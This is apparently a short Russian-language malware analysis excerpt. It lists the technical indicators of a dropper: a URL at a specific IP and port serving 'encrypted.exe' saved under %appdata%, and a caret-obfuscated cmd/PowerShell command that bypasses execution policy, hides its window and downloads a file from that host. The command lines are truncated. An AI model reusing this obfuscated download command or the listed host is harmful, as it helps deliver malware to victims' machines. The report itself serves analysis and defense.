Техническая информация
- http://185.165.31.75:801/encrypted.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powER^S^HELL.eX^e ^-E^xeCutIONpOlI^C^y^ bY^pA^S^S -NO^profILE^ ^-w^I^n^DOWSTyle^ hI^d^De^N (^n^e^w-Ob^j^Ec^t^ ^SYs^tem.nEt^.w^ebcLI^Ent^).DowNLO^a^DFil^e('http://185.165.31.75...
- '18#.#65.31.75':801
- '<SYSTEM32>\cmd.exe' /C "powER^S^HELL.eX^e ^-E^xeCutIONpOlI^C^y^ bY^pA^S^S -NO^profILE^ ^-w^I^n^DOWSTyle^ hI^d^De^N (^n^e^w-Ob^j^Ec^t^ ^SYs^tem.nEt^.w^ebcLI^Ent^).DowNLO^a^DFil^e('http://185.165.31.75...' (со скрытым окном)